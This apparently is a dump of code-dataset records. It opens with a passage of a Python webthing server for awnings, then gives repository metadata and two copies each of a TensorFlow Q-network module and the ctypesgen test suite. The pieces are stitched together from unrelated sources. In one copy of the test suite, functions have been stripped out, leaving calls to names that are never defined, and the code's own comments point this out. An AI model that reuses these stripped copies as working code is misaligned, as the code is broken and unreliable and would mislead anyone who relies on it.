                     metadata={
                         '@type': 'LevelProperty',
                         'title': 'Awning current position',
                         "type": "integer",
                         'minimum': 0,
                         'maximum': 100,
                         "unit": "percent",
                         'readOnly': True,
                         'description': 'awning current position'
                     }))
        # Read-only flag: awning is currently retracting.
        self.retracting = Value(0)
        self.add_property(
            Property(self,
                     'retracting',
                     self.retracting,
                     metadata={
                         '@type': 'BooleanProperty',
                         'title': 'Awning is retracting',
                         "type": "boolean",
                         'readOnly': True,
                         'description': 'Awning is retracting'
                     }))
        # Read-only flag: awning is currently extending.
        self.extending = Value(0)
        self.add_property(
            Property(self,
                     'extending',
                     self.extending,
                     metadata={
                         '@type': 'BooleanProperty',
                         'title': 'Awning is extending',
                         "type": "boolean",
                         'readOnly': True,
                         'description': 'Awning is extending'
                     }))
        self.ioloop = tornado.ioloop.IOLoop.current()
    def __target_position(self, new_postion):
        """Forward a target-position write to the awning controller."""
        self.awning.set_target_position(new_postion)
    def set_current_position(self, value):
        """Push the awning's reported position into the webthing property."""
        self.current_position.notify_of_external_update(value)
        logging.debug(self.awning.name + " position " + str(value) + " reached (target=" + str(self.target_position.get()) + ")")
    def set_retracting(self, value):
        """Push the retracting flag into the webthing property."""
        self.retracting.notify_of_external_update(value)
    def set_extending(self, value):
        """Push the extending flag into the webthing property."""
        self.extending.notify_of_external_update(value)
def run_server(port: int, filename: str, switch_pin_forward: int, switch_pin_backward: int, description: str):
    """Serve every awning configured in *filename* as a webthing.

    Builds one Awning per motor loaded from the TB6612FNG config, wraps each
    in an AnwingWebThing and starts a WebThingServer on *port*. If both
    switch pins are positive, a hardware Switch driving all awnings is
    attached as well. On KeyboardInterrupt the server is stopped and the
    function returns; on any other error the whole setup is torn down and
    rebuilt after a short pause (outer while loop).
    """
    while True:
        awnings = [Awning(motor) for motor in load_tb6612fng(filename)]
        awning_webthings = [AnwingWebThing(description, anwing) for anwing in awnings]
        server = WebThingServer(MultipleThings(awning_webthings, 'Awnings'), port=port, disable_host_validation=True)
        if switch_pin_forward > 0 and switch_pin_backward > 0:
            Switch(switch_pin_forward, switch_pin_backward, awnings=awnings)
        try:
            logging.info('starting the server')
            server.start()
        except KeyboardInterrupt:
            logging.info('stopping the server')
            server.stop()
            logging.info('done')
            return
        except Exception as e:
            # was logging.error(e): that dropped the traceback, which made
            # failures inside server.start() nearly impossible to diagnose
            logging.exception('server failed (%s); restarting in 3 seconds', e)
            sleep(3)
| 4,233 | 47 | 312 |
b6c77329018b75234038e92dc58bc0aed4fb2fad | 1,154 | py | Python | q_functions.py | brett-daley/dqn-lambda | e1bbbaecf18cdc9f8edfbef8075b988a61e21235 | [
"MIT"
] | 19 | 2020-02-17T06:47:40.000Z | 2022-03-30T21:39:49.000Z | q_functions.py | brett-daley/dqn-lambda | e1bbbaecf18cdc9f8edfbef8075b988a61e21235 | [
"MIT"
] | 6 | 2020-01-28T23:11:31.000Z | 2022-02-10T00:39:48.000Z | q_functions.py | brett-daley/dqn-lambda | e1bbbaecf18cdc9f8edfbef8075b988a61e21235 | [
"MIT"
] | 5 | 2020-01-31T05:29:24.000Z | 2022-03-15T08:30:06.000Z | import tensorflow as tf
from tensorflow.python.layers.layers import *
| 38.466667 | 92 | 0.681109 | import tensorflow as tf
from tensorflow.python.layers.layers import *
def cartpole_mlp(state, n_actions, scope):
    """Two-layer tanh MLP Q-network for CartPole-sized inputs.

    Flattens *state* to 2-D, applies two 512-unit tanh layers under the
    variable scope *scope* (reused on repeated calls) and returns a linear
    output tensor with one Q-value per action.
    """
    net = flatten(state)  # flatten to make sure 2-D
    with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
        for _ in range(2):
            net = dense(net, units=512, activation=tf.nn.tanh)
        qvalues = dense(net, units=n_actions, activation=None)
    return qvalues
def atari_cnn(state, n_actions, scope):
    """DQN-style convolutional Q-network for Atari frames.

    Casts uint8 pixels to floats in [0, 1], folds the axis-1 frame stack
    into channels, applies the three classic DQN conv layers and a 512-unit
    dense layer, and returns a linear output with one Q-value per action.
    Variables live under *scope* and are reused on repeated calls.
    """
    # scale pixels into [0, 1] and merge the frame axis into channels
    frames = tf.cast(state, tf.float32) / 255.0
    net = tf.concat(tf.unstack(frames, axis=1), axis=-1)
    with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
        # (filters, kernel, stride) per conv layer, in order
        for n_filters, kernel, stride in ((32, 8, 4), (64, 4, 2), (64, 3, 1)):
            net = conv2d(net, filters=n_filters, kernel_size=kernel, strides=stride, activation=tf.nn.relu)
        net = dense(flatten(net), units=512, activation=tf.nn.relu)
        qvalues = dense(net, units=n_actions, activation=None)
    return qvalues
| 1,036 | 0 | 46 |
71a31accb034925ee37a6aa3d035b5ee027cd116 | 78,984 | py | Python | ctypesgen/test/testsuite.py | EPC-MSU/ctypesgen | 21979b7dce0382f3e78ca18efc552217c60c46ef | [
"BSD-2-Clause"
] | null | null | null | ctypesgen/test/testsuite.py | EPC-MSU/ctypesgen | 21979b7dce0382f3e78ca18efc552217c60c46ef | [
"BSD-2-Clause"
] | null | null | null | ctypesgen/test/testsuite.py | EPC-MSU/ctypesgen | 21979b7dce0382f3e78ca18efc552217c60c46ef | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: ascii -*-
# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab
#
"""Simple test suite using unittest.
By clach04 (Chris Clark).
Calling:
python test/testsuite.py
or
cd test
./testsuite.py
Could use any unitest compatible test runner (nose, etc.)
Aims to test for regressions. Where possible use stdlib to
avoid the need to compile C code.
Known to run clean with:
* 32bit Linux (python 2.5.2, 2.6)
* 32bit Windows XP (python 2.4, 2.5, 2.6.1)
"""
import sys
import os
import ctypes
import math
import unittest
import logging
from subprocess import Popen, PIPE
test_directory = os.path.abspath(os.path.dirname(__file__))
sys.path.append(test_directory)
sys.path.append(os.path.join(test_directory, os.pardir))
import ctypesgentest # TODO consider moving test() from ctypesgentest into this module
def cleanup_json_src_paths(json):
    """
    Normalize machine-specific source paths inside ctypesgen JSON output so
    test comparisons succeed on all machines/user accounts.

    Items whose ctype is a struct or enum carry a source path as the first
    element of ctype["src"]; it is rewritten in place to a fixed placeholder.
    """
    path_bearing_klasses = ("CtypesStruct", "CtypesEnum")
    for item in json:
        if "ctype" in item and item["ctype"]["Klass"] in path_bearing_klasses:
            item["ctype"]["src"][0] = "/some-path/temp.h"
class StdBoolTest(unittest.TestCase):
    """Test correct parsing and generation of the C99 bool type."""
    def setUp(self):
        """NOTE this is called once for each test* method
        (it is not called once per class).
        FIXME This is slightly inefficient as it is called *way* more times than it needs to be.
        """
        # Generate ctypes bindings for a struct containing a bool member.
        header_str = """
#include <stdbool.h>
struct foo
{
    bool is_bar;
    int a;
};
"""
        self.module, _ = ctypesgentest.test(header_str)  # , all_headers=True)
    def test_stdbool_type(self):
        """bool must map to ctypes.c_bool (and int to c_int) in _fields_."""
        module = self.module
        struct_foo = module.struct_foo
        self.assertEqual(struct_foo._fields_, [("is_bar", ctypes.c_bool), ("a", ctypes.c_int)])
class SimpleMacrosTest(unittest.TestCase):
    """Based on simple_macros.py

    Exercises ctypesgen's translation of C #define macros (constants,
    function-like macros, ternaries, stringification) into Python.
    NOTE(review): some tests reference self._json, which is not defined in
    this excerpt (presumably removed by the dataset's function filter), and
    there is no tearDown here — confirm both against the full file.
    """
    def setUp(self):
        """NOTE this is called once for each test* method
        (it is not called once per class).
        FIXME This is slightly inefficient as it is called *way* more times than it needs to be.
        """
        # One header exercising every macro form under test.
        header_str = """
#define A 1
#define B(x,y) x+y
#define C(a,b,c) a?b:c
#define funny(x) "funny" #x
#define multipler_macro(x,y) x*y
#define minus_macro(x,y) x-y
#define divide_macro(x,y) x/y
#define mod_macro(x,y) x%y
#define subcall_macro_simple(x) (A)
#define subcall_macro_simple_plus(x) (A) + (x)
#define subcall_macro_minus(x,y) minus_macro(x,y)
#define subcall_macro_minus_plus(x,y,z) (minus_macro(x,y)) + (z)
"""
        libraries = None
        # Generate both a Python module and a JSON description of the header.
        self.module, output = ctypesgentest.test(header_str)
        self.json, output = ctypesgentest.test(header_str, output_language="json")
    def test_macro_constant_int(self):
        """Tests from simple_macros.py
        """
        module, json = self.module, self._json
        self.assertEqual(module.A, 1)
        self.assertEqual(json("A"), {"name": "A", "type": "macro", "value": "1"})
    def test_macro_addition(self):
        """Tests from simple_macros.py
        """
        module = self.module
        self.assertEqual(module.B(2, 2), 4)
    def test_macro_ternary_json(self):
        """Tests from simple_macros.py
        """
        json = self._json
        self.assertEqual(
            json("C"),
            {
                "args": ["a", "b", "c"],
                "body": "a and b or c",
                "name": "C",
                "type": "macro_function",
            },
        )
    def test_macro_ternary_true(self):
        """Tests from simple_macros.py
        """
        module = self.module
        self.assertEqual(module.C(True, 1, 2), 1)
    def test_macro_ternary_false(self):
        """Tests from simple_macros.py
        """
        module = self.module
        self.assertEqual(module.C(False, 1, 2), 2)
    def test_macro_ternary_true_complex(self):
        """Test ?: with true, using values that can not be confused between True and 1
        """
        module = self.module
        self.assertEqual(module.C(True, 99, 100), 99)
    def test_macro_ternary_false_complex(self):
        """Test ?: with false, using values that can not be confused between True and 1
        """
        module = self.module
        self.assertEqual(module.C(False, 99, 100), 100)
    def test_macro_string_compose(self):
        """Tests from simple_macros.py
        """
        module = self.module
        self.assertEqual(module.funny("bunny"), "funnybunny")
    def test_macro_string_compose_json(self):
        """Tests from simple_macros.py
        """
        json = self._json
        self.assertEqual(
            json("funny"),
            {"args": ["x"], "body": "('funny' + x)", "name": "funny", "type": "macro_function"},
        )
    def test_macro_subcall_simple(self):
        """Test use of a constant valued macro within a macro"""
        module = self.module
        self.assertEqual(module.subcall_macro_simple(2), 1)
    def test_macro_subcall_simple_plus(self):
        """Test math with constant valued macro within a macro"""
        module = self.module
        self.assertEqual(module.subcall_macro_simple_plus(2), 1 + 2)
    def test_macro_subcall_minus(self):
        """Test use of macro function within a macro"""
        module = self.module
        x, y = 2, 5
        self.assertEqual(module.subcall_macro_minus(x, y), x - y)
    def test_macro_subcall_minus_plus(self):
        """Test math with a macro function within a macro"""
        module = self.module
        x, y, z = 2, 5, 1
        self.assertEqual(module.subcall_macro_minus_plus(x, y, z), (x - y) + z)
class StructuresTest(unittest.TestCase):
    """Based on structures.py

    Verifies struct field generation, bitfields, __attribute__((packed)) and
    #pragma pack handling, and typedef-vs-field-name shadowing.
    NOTE(review): this excerpt calls compute_packed and cleanup_json_src_paths;
    compute_packed is not defined in this excerpt (presumably removed by the
    dataset's function filter) — confirm against the full file.
    """
    def setUp(self):
        """NOTE this is called once for each test* method
        (it is not called once per class).
        FIXME This is slightly inefficient as it is called *way* more times than it needs to be.
        NOTE: Very possibly, if you change this header string, you need to change the line
        numbers in the JSON output test result below (in
        test_struct_json).
        """
        header_str = """
struct foo
{
    int a;
    char b;
    int c;
    int d : 15;
    int : 17;
};
struct __attribute__((packed)) packed_foo
{
    int a;
    char b;
    int c;
    int d : 15;
    int : 17;
};
typedef struct
{
    int a;
    char b;
    int c;
    int d : 15;
    int : 17;
} foo_t;
typedef struct __attribute__((packed))
{
    int a;
    char b;
    int c;
    int d : 15;
    int : 17;
} packed_foo_t;
#pragma pack(push, 4)
typedef struct
{
    int a;
    char b;
    int c;
    int d : 15;
    int : 17;
} pragma_packed_foo_t;
#pragma pack(pop)
#pragma pack(push, thing1, 2)
#pragma pack(push, thing2, 4)
#pragma pack(pop)
#pragma pack(push, thing3, 8)
#pragma pack(push, thing4, 16)
#pragma pack(pop, thing3)
struct pragma_packed_foo2
{
    int a;
    char b;
    int c;
    int d : 15;
    int : 17;
};
#pragma pack(pop, thing1)
struct foo3
{
    int a;
    char b;
    int c;
    int d : 15;
    int : 17;
};
typedef int Int;
typedef struct {
    int Int;
} id_struct_t;
"""
        libraries = None
        self.module, output = ctypesgentest.test(header_str)
        self.json, output = ctypesgentest.test(header_str, output_language="json")
        cleanup_json_src_paths(self.json)
    def test_fields(self):
        """Test whether fields are built correctly.
        """
        struct_foo = self.module.struct_foo
        self.assertEqual(
            struct_foo._fields_,
            [
                ("a", ctypes.c_int),
                ("b", ctypes.c_char),
                ("c", ctypes.c_int),
                ("d", ctypes.c_int, 15),
                ("unnamed_1", ctypes.c_int, 17),
            ],
        )
    def test_pack(self):
        """Test whether gcc __attribute__((packed)) is interpreted correctly.
        """
        unpacked_size = compute_packed(4, [ctypes.c_int] * 3 + [ctypes.c_char])
        packed_size = compute_packed(1, [ctypes.c_int] * 3 + [ctypes.c_char])
        struct_foo = self.module.struct_foo
        struct_packed_foo = self.module.struct_packed_foo
        foo_t = self.module.foo_t
        packed_foo_t = self.module.packed_foo_t
        self.assertEqual(getattr(struct_foo, "_pack_", 0), 0)
        self.assertEqual(getattr(struct_packed_foo, "_pack_", 0), 1)
        self.assertEqual(getattr(foo_t, "_pack_", 0), 0)
        self.assertEqual(getattr(packed_foo_t, "_pack_", -1), 1)
        self.assertEqual(ctypes.sizeof(struct_foo), unpacked_size)
        self.assertEqual(ctypes.sizeof(foo_t), unpacked_size)
        self.assertEqual(ctypes.sizeof(struct_packed_foo), packed_size)
        self.assertEqual(ctypes.sizeof(packed_foo_t), packed_size)
    def test_pragma_pack(self):
        """Test whether #pragma pack(...) is interpreted correctly.
        """
        packed4_size = compute_packed(4, [ctypes.c_int] * 3 + [ctypes.c_char])
        packed2_size = compute_packed(2, [ctypes.c_int] * 3 + [ctypes.c_char])
        unpacked_size = compute_packed(4, [ctypes.c_int] * 3 + [ctypes.c_char])
        pragma_packed_foo_t = self.module.pragma_packed_foo_t
        struct_pragma_packed_foo2 = self.module.struct_pragma_packed_foo2
        struct_foo3 = self.module.struct_foo3
        self.assertEqual(getattr(pragma_packed_foo_t, "_pack_", 0), 4)
        self.assertEqual(getattr(struct_pragma_packed_foo2, "_pack_", 0), 2)
        self.assertEqual(getattr(struct_foo3, "_pack_", 0), 0)
        self.assertEqual(ctypes.sizeof(pragma_packed_foo_t), packed4_size)
        self.assertEqual(ctypes.sizeof(struct_pragma_packed_foo2), packed2_size)
        self.assertEqual(ctypes.sizeof(struct_foo3), unpacked_size)
    def test_typedef_vs_field_id(self):
        """Test whether local field identifier names can override external
        typedef names.
        """
        Int = self.module.Int
        id_struct_t = self.module.id_struct_t
        self.assertEqual(Int, ctypes.c_int)
        self.assertEqual(id_struct_t._fields_, [("Int", ctypes.c_int)])
class MathTest(unittest.TestCase):
    """Based on math_functions.py"""
    def setUp(self):
        """NOTE this is called once for each test* method
        (it is not called once per class).
        FIXME This is slightly inefficient as it is called *way* more times than it needs to be.
        """
        header_str = """
#include <math.h>
#define sin_plus_y(x,y) (sin(x) + (y))
"""
        if sys.platform == "win32":
            # pick something from %windir%\system32\msvc*dll that include stdlib
            # NOTE(review): the ".dll" assignment below is immediately
            # overwritten — looks like dead code; confirm intent.
            libraries = ["msvcrt.dll"]
            libraries = ["msvcrt"]
        elif sys.platform.startswith("linux"):
            libraries = ["libm.so.6"]
        else:
            libraries = ["libc"]
        self.module, output = ctypesgentest.test(header_str, libraries=libraries, all_headers=True)
    def test_sin(self):
        """Generated sin() must agree with Python's math.sin."""
        module = self.module
        self.assertEqual(module.sin(2), math.sin(2))
    def test_sqrt(self):
        """Generated sqrt() must return the exact root for a perfect square."""
        module = self.module
        self.assertEqual(module.sqrt(4), 2)
        # NOTE(review): local_test is not defined in this excerpt (presumably
        # a nested helper removed by the dataset's function filter) — this
        # call would raise NameError here; confirm against the full file.
        self.assertRaises(ctypes.ArgumentError, local_test)
    def test_bad_args_string_not_number(self):
        """Passing a non-numeric argument must raise ctypes.ArgumentError."""
        module = self.module
        # NOTE(review): local_test undefined in this excerpt — see test_sqrt.
        self.assertRaises(ctypes.ArgumentError, local_test)
    def test_subcall_sin(self):
        """Test math with sin(x) in a macro"""
        module = self.module
        self.assertEqual(module.sin_plus_y(2, 1), math.sin(2) + 1)
class LongDoubleTest(unittest.TestCase):
    """Verify that C's 'long double' maps to ctypes.c_longdouble."""

    def setUp(self):
        # Regenerate bindings for a tiny struct before every test method.
        header = """
struct foo
{
    long double is_bar;
    int a;
};
"""
        self.module, _ = ctypesgentest.test(header)  # , all_headers=True)

    def test_longdouble_type(self):
        """The generated struct must pair c_longdouble with c_int."""
        fields = self.module.struct_foo._fields_
        self.assertEqual(
            fields, [("is_bar", ctypes.c_longdouble), ("a", ctypes.c_int)]
        )
class UncheckedTest(unittest.TestCase):
    """Regression for a 1.0.0 bug: a function pointer returning a basic type
    must keep that basic return type instead of being treated as a pointer."""

    def setUp(self):
        # A single typedef of a function pointer returning plain int.
        header = """
typedef int (*some_type_of_answer)(void*);
"""
        self.module, self.output = ctypesgentest.test(header, all_headers=False)

    def test_unchecked_prototype(self):
        """The generated function type must return c_int and take one void*."""
        answer = self.module.some_type_of_answer()
        self.assertEqual(answer.restype, ctypes.c_int)
        self.assertEqual(answer.argtypes, (ctypes.c_void_p,))
if __name__ == "__main__":
    # Script entry point: exit with the test runner's status code.
    # NOTE(review): main() is not defined anywhere in this excerpt — it was
    # presumably removed by the dataset's function filter; confirm it exists
    # in the full file before running this module directly.
    sys.exit(main())
| 35.260714 | 106 | 0.309696 | #!/usr/bin/env python3
# -*- coding: ascii -*-
# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab
#
"""Simple test suite using unittest.
By clach04 (Chris Clark).
Calling:
python test/testsuite.py
or
cd test
./testsuite.py
Could use any unitest compatible test runner (nose, etc.)
Aims to test for regressions. Where possible use stdlib to
avoid the need to compile C code.
Known to run clean with:
* 32bit Linux (python 2.5.2, 2.6)
* 32bit Windows XP (python 2.4, 2.5, 2.6.1)
"""
import sys
import os
import ctypes
import math
import unittest
import logging
from subprocess import Popen, PIPE
test_directory = os.path.abspath(os.path.dirname(__file__))
sys.path.append(test_directory)
sys.path.append(os.path.join(test_directory, os.pardir))
import ctypesgentest # TODO consider moving test() from ctypesgentest into this module
def cleanup_json_src_paths(json):
    """
    JSON stores the path to some source items. These need to be genericized in
    order for tests to succeed on all machines/user accounts.

    Mutates *json* in place: for every item whose ctype is a struct or enum,
    the first element of its "src" entry (the source file path) is replaced
    with the fixed placeholder "/some-path/temp.h".
    """
    TYPES_W_PATHS = ["CtypesStruct", "CtypesEnum"]
    for i in json:
        if "ctype" in i and i["ctype"]["Klass"] in TYPES_W_PATHS:
            i["ctype"]["src"][0] = "/some-path/temp.h"
def compare_json(test_instance, json, json_ans, verbose=False):
    """Compare generated JSON output against the stored answer, item by item.

    Uses *test_instance*.assertEqual so mismatches surface as ordinary
    unittest assertion failures. With verbose=True, mismatches are printed
    (including any excess items when the lengths differ); with verbose=False
    the first failure is re-raised immediately.
    """
    print_excess = False
    try:
        test_instance.assertEqual(len(json), len(json_ans))
    except AssertionError:  # was a bare except: — it also trapped SystemExit etc.
        if verbose:
            print(
                "JSONs do not have same length: ",
                len(json),
                "generated vs",
                len(json_ans),
                "stored",
            )
            print_excess = True
        else:
            raise
    # first fix paths that exist inside JSON to avoid user-specific paths:
    for i, ith_json_ans in zip(json, json_ans):
        try:
            test_instance.assertEqual(i, ith_json_ans)
        except AssertionError:  # was a bare except:
            if verbose:
                print("\nFailed JSON for: ", i["name"])
                print("GENERATED:\n", i, "\nANS:\n", ith_json_ans)
            raise
    if print_excess:
        if len(json) > len(json_ans):
            j, jlen, jlabel = json, len(json_ans), "generated"
        else:
            j, jlen, jlabel = json_ans, len(json), "stored"
        import pprint
        print("Excess JSON content from", jlabel, "content:")
        pprint.pprint(j[jlen:])
def compute_packed(modulo, fields):
    """Return the expected packed size of a struct with the given fields.

    Each field's ctypes size is rounded up to the next multiple of *modulo*
    (the pack alignment) and the rounded sizes are summed.
    """
    total = 0
    for field in fields:
        size = ctypes.sizeof(field)
        # ceil-divide by the alignment, then scale back up
        total += -(-size // modulo) * modulo
    return total
class StdlibTest(unittest.TestCase):
    """Smoke-test ctypesgen bindings against the C standard library (getenv)."""
    def setUp(self):
        """NOTE this is called once for each test* method
        (it is not called once per class).
        FIXME This is slightly inefficient as it is called *way* more times than it needs to be.
        """
        header_str = "#include <stdlib.h>\n"
        if sys.platform == "win32":
            # pick something from %windir%\system32\msvc*dll that include stdlib
            # NOTE(review): the ".dll" assignment below is immediately
            # overwritten — looks like dead code; confirm intent.
            libraries = ["msvcrt.dll"]
            libraries = ["msvcrt"]
        elif sys.platform.startswith("linux"):
            libraries = ["libc.so.6"]
        else:
            libraries = ["libc"]
        self.module, output = ctypesgentest.test(header_str, libraries=libraries, all_headers=True)
    def tearDown(self):
        """Release the generated module and clean up generated artifacts."""
        del self.module
        ctypesgentest.cleanup()
    def test_getenv_returns_string(self):
        """Issue 8 - Regression for crash with 64 bit and bad strings on 32 bit.
        See http://code.google.com/p/ctypesgen/issues/detail?id=8
        Test that we get a valid (non-NULL, non-empty) string back
        """
        module = self.module
        if sys.platform == "win32":
            # Check a variable that is already set
            env_var_name = (
                "USERNAME"
            )  # this is always set (as is windir, ProgramFiles, USERPROFILE, etc.)
            expect_result = os.environ[env_var_name]
            self.assertTrue(expect_result, "this should not be None or empty")
            # reason for using an existing OS variable is that unless the
            # MSVCRT dll imported is the exact same one that Python was
            # built with you can't share structures, see
            # http://msdn.microsoft.com/en-us/library/ms235460.aspx
            # "Potential Errors Passing CRT Objects Across DLL Boundaries"
        else:
            env_var_name = "HELLO"
            os.environ[env_var_name] = "WORLD"  # This doesn't work under win32
            expect_result = "WORLD"
        result = str(module.getenv(env_var_name))
        self.assertEqual(expect_result, result)
    def test_getenv_returns_null(self):
        """Related to issue 8. Test getenv of unset variable.
        """
        module = self.module
        env_var_name = "NOT SET"
        expect_result = None
        try:
            # ensure variable is not set, ignoring not set errors
            del os.environ[env_var_name]
        except KeyError:
            pass
        result = module.getenv(env_var_name)
        self.assertEqual(expect_result, result)
class StdBoolTest(unittest.TestCase):
    """Verify that C99 bool (via <stdbool.h>) maps to ctypes.c_bool."""

    def setUp(self):
        # Runs before every test method; regenerates the bindings each time.
        header = """
#include <stdbool.h>
struct foo
{
    bool is_bar;
    int a;
};
"""
        self.module, _ = ctypesgentest.test(header)  # , all_headers=True)

    def tearDown(self):
        # Drop the generated module and remove any generated artifacts.
        del self.module
        ctypesgentest.cleanup()

    def test_stdbool_type(self):
        """The struct's bool member must be c_bool, the int member c_int."""
        fields = self.module.struct_foo._fields_
        self.assertEqual(fields, [("is_bar", ctypes.c_bool), ("a", ctypes.c_int)])
class SimpleMacrosTest(unittest.TestCase):
    """Based on simple_macros.py

    Exercises ctypesgen's translation of C #define macros (constants,
    function-like macros, ternaries, stringification, arithmetic, and
    macros calling other macros) into both Python code and JSON output.
    """
    def setUp(self):
        """NOTE this is called once for each test* method
        (it is not called once per class).
        FIXME This is slightly inefficient as it is called *way* more times than it needs to be.
        """
        # One header exercising every macro form under test.
        header_str = """
#define A 1
#define B(x,y) x+y
#define C(a,b,c) a?b:c
#define funny(x) "funny" #x
#define multipler_macro(x,y) x*y
#define minus_macro(x,y) x-y
#define divide_macro(x,y) x/y
#define mod_macro(x,y) x%y
#define subcall_macro_simple(x) (A)
#define subcall_macro_simple_plus(x) (A) + (x)
#define subcall_macro_minus(x,y) minus_macro(x,y)
#define subcall_macro_minus_plus(x,y,z) (minus_macro(x,y)) + (z)
"""
        libraries = None
        # Generate both a Python module and a JSON description of the header.
        self.module, output = ctypesgentest.test(header_str)
        self.json, output = ctypesgentest.test(header_str, output_language="json")
    def _json(self, name):
        """Return the JSON entry whose "name" equals *name* (KeyError if absent)."""
        for i in self.json:
            if i["name"] == name:
                return i
        raise KeyError("Could not find JSON entry")
    def tearDown(self):
        """Release generated outputs and clean up generated artifacts."""
        del self.module, self.json
        ctypesgentest.cleanup()
    def test_macro_constant_int(self):
        """Tests from simple_macros.py
        """
        module, json = self.module, self._json
        self.assertEqual(module.A, 1)
        self.assertEqual(json("A"), {"name": "A", "type": "macro", "value": "1"})
    def test_macro_addition_json(self):
        """JSON body of B(x,y) must be the translated addition expression."""
        json = self._json
        self.assertEqual(
            json("B"),
            {"args": ["x", "y"], "body": "(x + y)", "name": "B", "type": "macro_function"},
        )
    def test_macro_addition(self):
        """Tests from simple_macros.py
        """
        module = self.module
        self.assertEqual(module.B(2, 2), 4)
    def test_macro_ternary_json(self):
        """Tests from simple_macros.py
        """
        json = self._json
        self.assertEqual(
            json("C"),
            {
                "args": ["a", "b", "c"],
                "body": "a and b or c",
                "name": "C",
                "type": "macro_function",
            },
        )
    def test_macro_ternary_true(self):
        """Tests from simple_macros.py
        """
        module = self.module
        self.assertEqual(module.C(True, 1, 2), 1)
    def test_macro_ternary_false(self):
        """Tests from simple_macros.py
        """
        module = self.module
        self.assertEqual(module.C(False, 1, 2), 2)
    def test_macro_ternary_true_complex(self):
        """Test ?: with true, using values that can not be confused between True and 1
        """
        module = self.module
        self.assertEqual(module.C(True, 99, 100), 99)
    def test_macro_ternary_false_complex(self):
        """Test ?: with false, using values that can not be confused between True and 1
        """
        module = self.module
        self.assertEqual(module.C(False, 99, 100), 100)
    def test_macro_string_compose(self):
        """Tests from simple_macros.py
        """
        module = self.module
        self.assertEqual(module.funny("bunny"), "funnybunny")
    def test_macro_string_compose_json(self):
        """Tests from simple_macros.py
        """
        json = self._json
        self.assertEqual(
            json("funny"),
            {"args": ["x"], "body": "('funny' + x)", "name": "funny", "type": "macro_function"},
        )
    def test_macro_math_multipler(self):
        """Generated multiplication macro must compute x*y."""
        module = self.module
        x, y = 2, 5
        self.assertEqual(module.multipler_macro(x, y), x * y)
    def test_macro_math_multiplier_json(self):
        """JSON body of the multiplication macro."""
        json = self._json
        self.assertEqual(
            json("multipler_macro"),
            {
                "args": ["x", "y"],
                "body": "(x * y)",
                "name": "multipler_macro",
                "type": "macro_function",
            },
        )
    def test_macro_math_minus(self):
        """Generated subtraction macro must compute x-y."""
        module = self.module
        x, y = 2, 5
        self.assertEqual(module.minus_macro(x, y), x - y)
    def test_macro_math_minus_json(self):
        """JSON body of the subtraction macro."""
        json = self._json
        self.assertEqual(
            json("minus_macro"),
            {
                "args": ["x", "y"],
                "body": "(x - y)",
                "name": "minus_macro",
                "type": "macro_function",
            },
        )
    def test_macro_math_divide(self):
        """Generated division macro must compute x/y."""
        module = self.module
        x, y = 2, 5
        self.assertEqual(module.divide_macro(x, y), x / y)
    def test_macro_math_divide_json(self):
        """JSON body of the division macro."""
        json = self._json
        self.assertEqual(
            json("divide_macro"),
            {
                "args": ["x", "y"],
                "body": "(x / y)",
                "name": "divide_macro",
                "type": "macro_function",
            },
        )
    def test_macro_math_mod(self):
        """Generated modulo macro must compute x%y."""
        module = self.module
        x, y = 2, 5
        self.assertEqual(module.mod_macro(x, y), x % y)
    def test_macro_math_mod_json(self):
        """JSON body of the modulo macro."""
        json = self._json
        self.assertEqual(
            json("mod_macro"),
            {"args": ["x", "y"], "body": "(x % y)", "name": "mod_macro", "type": "macro_function"},
        )
    def test_macro_subcall_simple(self):
        """Test use of a constant valued macro within a macro"""
        module = self.module
        self.assertEqual(module.subcall_macro_simple(2), 1)
    def test_macro_subcall_simple_json(self):
        """JSON body of a macro that expands to another macro's constant."""
        json = self._json
        self.assertEqual(
            json("subcall_macro_simple"),
            {"args": ["x"], "body": "A", "name": "subcall_macro_simple", "type": "macro_function"},
        )
    def test_macro_subcall_simple_plus(self):
        """Test math with constant valued macro within a macro"""
        module = self.module
        self.assertEqual(module.subcall_macro_simple_plus(2), 1 + 2)
    def test_macro_subcall_simple_plus_json(self):
        """JSON body of arithmetic with a constant macro inside a macro."""
        json = self._json
        self.assertEqual(
            json("subcall_macro_simple_plus"),
            {
                "args": ["x"],
                "body": "(A + x)",
                "name": "subcall_macro_simple_plus",
                "type": "macro_function",
            },
        )
    def test_macro_subcall_minus(self):
        """Test use of macro function within a macro"""
        module = self.module
        x, y = 2, 5
        self.assertEqual(module.subcall_macro_minus(x, y), x - y)
    def test_macro_subcall_minus_json(self):
        """JSON body of a macro that calls another macro function."""
        json = self._json
        self.assertEqual(
            json("subcall_macro_minus"),
            {
                "args": ["x", "y"],
                "body": "(minus_macro (x, y))",
                "name": "subcall_macro_minus",
                "type": "macro_function",
            },
        )
    def test_macro_subcall_minus_plus(self):
        """Test math with a macro function within a macro"""
        module = self.module
        x, y, z = 2, 5, 1
        self.assertEqual(module.subcall_macro_minus_plus(x, y, z), (x - y) + z)
    def test_macro_subcall_minus_plus_json(self):
        """JSON body of arithmetic with a macro-function call inside a macro."""
        json = self._json
        self.assertEqual(
            json("subcall_macro_minus_plus"),
            {
                "args": ["x", "y", "z"],
                "body": "((minus_macro (x, y)) + z)",
                "name": "subcall_macro_minus_plus",
                "type": "macro_function",
            },
        )
class StructuresTest(unittest.TestCase):
"""Based on structures.py
"""
def setUp(self):
"""NOTE this is called once for each test* method
(it is not called once per class).
FIXME This is slightly inefficient as it is called *way* more times than it needs to be.
NOTE: Very possibly, if you change this header string, you need to change the line
numbers in the JSON output test result below (in
test_struct_json).
"""
header_str = """
struct foo
{
int a;
char b;
int c;
int d : 15;
int : 17;
};
struct __attribute__((packed)) packed_foo
{
int a;
char b;
int c;
int d : 15;
int : 17;
};
typedef struct
{
int a;
char b;
int c;
int d : 15;
int : 17;
} foo_t;
typedef struct __attribute__((packed))
{
int a;
char b;
int c;
int d : 15;
int : 17;
} packed_foo_t;
#pragma pack(push, 4)
typedef struct
{
int a;
char b;
int c;
int d : 15;
int : 17;
} pragma_packed_foo_t;
#pragma pack(pop)
#pragma pack(push, thing1, 2)
#pragma pack(push, thing2, 4)
#pragma pack(pop)
#pragma pack(push, thing3, 8)
#pragma pack(push, thing4, 16)
#pragma pack(pop, thing3)
struct pragma_packed_foo2
{
int a;
char b;
int c;
int d : 15;
int : 17;
};
#pragma pack(pop, thing1)
